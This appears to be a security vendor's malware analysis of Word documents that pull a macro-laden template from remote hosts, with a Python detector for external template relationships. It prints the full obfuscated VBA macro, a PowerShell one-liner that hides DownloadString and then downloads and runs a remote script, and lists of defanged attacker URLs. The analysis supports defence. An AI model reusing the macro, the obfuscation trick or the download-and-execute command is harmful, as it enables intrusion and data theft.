The ASEC analysis team has confirmed that malicious Word documents of the same format as those introduced in the post “Malicious Word Documents Pretending ‘Korea Association for Political and Diplomatic History’ and ‘Policy Advisory Member Profile’ Being Distributed” are still being distributed. Like the documents covered in that post, the recently discovered files download a dotm file containing the malicious macro through an external link when they are opened. The filenames and external URLs confirmed so far are as follows.
| Date Discovered | Filename | External URL |
|---|---|---|
| July 3rd | [Office of the Inter-Korean Dialogue Policy Advisory Member] Profile Template.docx | hxxp://jupit.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm |
| July 6th | 00225 Conversation between Korean members of the National Assembly and American Members of Congress ***.docx | hxxp://modri.myartsonline.com/officeDocument/2006/relationships/BIO.dotm |
| July 9th | Professor *** BIO.docx | hxxp://visul.myartsonline.com/officeDocument/2006/relationships/BIO.dotm |
| July 12th | Professor ***-BIO.docx | hxxp://ccav.myartsonline.com/officeDocument/2006/relationships/BIO.dotm |
| July 15th | BIO Template.docx | hxxp://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm |
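The external link these documents rely on is the usual Word template-injection mechanism: the docx carries a relationship of type attachedTemplate in word/_rels/settings.xml.rels whose Target is a remote URL with TargetMode="External", so Word fetches the dotm, and with it the macro, when the document is opened. Every URL in the table also places the dotm under a path that mimics an OOXML relationship namespace (officeDocument/2006/relationships or Package/2006/relationships), which makes the link blend in with the genuine schema URIs that surround it in the relationship XML. The Python below is an added example, not ASEC's tooling or anything from the post: it builds a constructed in-memory docx-shaped zip carrying such a relationship (using the defanged tbear URL from the table as the constructed target) and a checker that reports any external attachedTemplate together with whether its path has that lookalike shape. A real sample would carry http rather than hxxp; the checker only inspects the relationship string, so the difference does not matter here.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OPC relationship namespace and the relationship type Word uses to point a
# document at its template (found in word/_rels/settings.xml.rels).
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)


def external_templates(docx_bytes):
    """Return (rels_path, target) for every attachedTemplate that points off-box.

    A benign document has no attachedTemplate or a local one (TargetMode absent,
    which OPC defines as Internal). TargetMode="External" with a URL is the
    template-injection pattern used by the documents in the table above.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("Type") != ATTACHED_TEMPLATE:
                    continue
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                hits.append((name, rel.get("Target")))
    return hits


def mimics_ooxml_namespace(target):
    """True when the URL path imitates an OOXML relationship namespace, as in the table."""
    return re.search(r"/(officeDocument|Package)/2006/relationships/", target) is not None


def scan(docx_bytes):
    """Findings for one document: each external template and whether its path looks like schema XML."""
    return [
        {"rels": rels, "target": target, "ooxml_lookalike_path": mimics_ooxml_namespace(target)}
        for rels, target in external_templates(docx_bytes)
    ]


def build_sample_docx(template_target, external=True):
    """Construct a minimal docx-shaped zip for testing (constructed input, not a real sample)."""
    mode = ' TargetMode="External"' if external else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="%s" Target="%s"%s/>'
        "</Relationships>"
    ) % (REL_NS, ATTACHED_TEMPLATE, template_target, mode)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr(
            "[Content_Types].xml",
            '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
        )
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


# Constructed target: the defanged dotm URL from the July 15th row of the table.
SAMPLE_TARGET = "hxxp://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm"

if __name__ == "__main__":
    for finding in scan(build_sample_docx(SAMPLE_TARGET)):
        print(finding)
    print("benign:", scan(build_sample_docx("Normal.dotm", external=False)))
```

Run the same scan over a real file by passing the bytes of the .docx; a document with no findings has no remote template, while any finding is worth treating as the downloader stage described in this post regardless of whether the path matches the lookalike pattern.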

The downloaded dotm files all include a macro that is the same type as the one previously discovered. Below is the malicious macro within the dotm file downloaded from the external link (hxxp://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm) of BIO Template.docx.
Private Sub Document_Open()
    ' Auto-run entry point: fires as soon as the downloaded template is loaded
    eifhhdfasfiedf
End Sub
Function eifhhdfasfiedf()
    Set djfeihfidkasljf = CreateObject("Shell.Application")
    Dim dfgdfjiejfjdshaj As String
    ' Junk token: Left("tlsiajdsladkf", 5) = "tlsia"; it is stripped from every fragment below
    fjdjkasf = "tlsiajdsladkf"
    fjdjkasf = Left(fjdjkasf, 5)
    ' Decodes to "powershell.exe"
    dfgdfjiejfjdshaj = "tlsiaptlsiaotlsiawtlsiaetlsiartlsiastlsiahtlsiaetlsialtlsialtlsia.tlsiaetlsiaxtlsiaetlsia"
    dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, fjdjkasf, "")
    ' Decodes to "[string]$a={(New-Object "
    hdfksallasjkdlaf = "tlsia[tlsiastlsiattlsiartlsiaitlsiantlsiagtlsia]tlsia$tlsiaatlsia=tlsia{tlsia(tlsiaNtlsiaetlsiawtlsia-tlsiaOtlsiabtlsiajtlsiaetlsiactlsiattlsia "
    hdfksallasjkdlaf = Replace(hdfksallasjkdlaf, fjdjkasf, "")
    ' Decodes to "Net.WebClient).Dong" (deliberately broken method name, repaired later with insert)
    ndkflajdkfjskdjfl = "tlsiaNtlsiaetlsiattlsia.tlsiaWtlsiaetlsiabtlsiaCtlsialtlsiaitlsiaetlsiantlsiattlsia)tlsia.tlsiaDotlsiantlsiagtlsia"
    ndkflajdkfjskdjfl = Replace(ndkflajdkfjskdjfl, fjdjkasf, "")
    ' Decodes to "('http://tbear.mypressonline.com/ci/mo.txt')"
    salfnxkfdlsjafkj = "('htlsiattlsiattlsiaptlsia:tlsia/tlsia/tlsiattlsiabtlsiaetlsiaatlsiartlsia.tlsiamtlsiaytlsiaptlsiartlsiaetlsiastlsiastlsiaotlsiantlsialtlsiaitlsiantlsiaetlsia.tlsiactlsiaotlsiamtlsia/tlsiactlsiaitlsia/tlsiamotlsia.tlsiattlsiaxtlsiat')"
    salfnxkfdlsjafkj = Replace(salfnxkfdlsjafkj, fjdjkasf, "")
    ' Decodes to "};$b=$a.insert(29,'"
    sjdfkjaslalsfial = "tlsia}tlsia;tlsia$tlsiabtlsia=tlsia$tlsiaatlsia.tlsiaitlsiantlsiastlsiaetlsiartlsiattlsia(tlsia2tlsia9tlsia,tlsia'"
    sjdfkjaslalsfial = Replace(sjdfkjaslalsfial, fjdjkasf, "")
    ' Decodes to "wnloadstri');$c=i"
    aksfkjaskjfksnkf = "tlsiatlsiawtlsiantlsialtlsiaotlsiaatlsiadtlsiastlsiattlsiartlsiaitlsia'tlsia)tlsia;tlsia$tlsiactlsia=tlsiaitlsia"
    aksfkjaskjfksnkf = Replace(aksfkjaskjfksnkf, fjdjkasf, "")
    ' Decodes to "ex $b;iex $c"
    sdfewjdhsajkfhjdf = "etlsiaxtlsia tlsia$tlsiabtlsia;tlsiaitlsiaetlsiaxtlsia tlsia$tlsiactlsia"
    sdfewjdhsajkfhjdf = Replace(sdfewjdhsajkfhjdf, fjdjkasf, "")
    ' Reassemble the PowerShell argument string from the decoded fragments
    skdjfksjkfjkdsfj = hdfksallasjkdlaf + ndkflajdkfjskdjfl + salfnxkfdlsjafkj + sjdfkjaslalsfial + aksfkjaskjfksnkf + sdfewjdhsajkfhjdf
    ' Launch powershell.exe with that argument string; nShowCmd = 0 keeps the window hidden
    djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, skdjfksjkfjkdsfj, "", "open", 0
End Function
Code 1. Macro code within BIO.dotm file
When the macro is executed, the PowerShell command below is run. The command avoids spelling out DownloadString: $a is a script block whose text calls a non-existent method Dong, casting it with [string] yields the block's text without the braces, and $a.insert(29,'wnloadstri') splices the missing characters into that text. $c=iex $b then evaluates the repaired expression, which downloads the script at hxxp://tbear.mypressonline.com/ci/mo.txt into $c, and iex $c runs it.
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [string]$a={(New-Object Net.WebClient).Dong('hxxp://tbear.mypressonline.com/ci/mo.txt')};$b=$a.insert(29,'wnloadstri');$c=iex $b;iex $c

The malicious script has the same format as the one explained in the previous post except for the C2 URL, and performs behaviors such as collecting user information and downloading additional files as shown below.
- Downloads additional malicious files
- Collects list of recent files
- Collects SystemInfo
- Collects tasklist
- Uploads collected files
In addition to the URLs above, a number of other URLs hosting the malicious dotm files (first list) and the malicious scripts they download (second list) were confirmed.
- hxxp://btige.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
- hxxp://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm
- hxxp://stair.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
- hxxp://ccav.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
- hxxp://visul.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
- hxxp://modri.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
- hxxp://ranso.myartsonline.com/Package/2006/relationships/InterKoreanSummit.dotm
- hxxp://lieon.mypressonline.com/Package/2006/relationships/InterKoreanSummit.dotm
- hxxp://chels.mypressonline.com/Package/2006/relationships/InterKoreanSummit.dotm
- hxxp://warcr.onlinewebshop.net/Package/2006/relationships/InterKoreanSummit.dotm
- hxxp://jupit.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm
- hxxp://ripzi.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm

- hxxp://stair.myartsonline.com/ya/ng.txt
- hxxp://lovels.myartsonline.com/ys/ha.txt
- hxxp://lovel.myartsonline.com/le/ej.txt
- hxxp://visul.myartsonline.com/yk/yo.txt
- hxxp://vbqwer.mypressonline.com/test.log
- hxxp://tbear.mypressonline.com/test.txt
- hxxp://obser.mygamesonline.org/nw.txt
- hxxp://modri.myartsonline.com/gu/nw.txt
- hxxp://warcr.onlinewebshop.net/le/eh.txt
- hxxp://stair.atwebpages.com/ne/la.txt
- hxxp://giruz.atwebpages.com/sw/cu.txt
- hxxp://benze.atwebpages.com/ki/mc.txt
- hxxp://likel.atwebpages.com/bu/ma.txt
- hxxp://rster.atwebpages.com/an/ce.txt
- hxxp://mantc.getenjoyment.net/ya/ng.txt
As targeted malware disguised as normal Word documents is still being distributed, users need to take extra caution: do not open files from unknown sources, and do not run macros included in document files. In addition, because the malware changes the macro security settings, users should periodically check those settings and keep them at a high level.
AhnLab’s anti-malware product, V3, detects and blocks the types of files above using the aliases below.
[File Detection]
- Downloader/XML.External
- Downloader/DOC.Agent
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.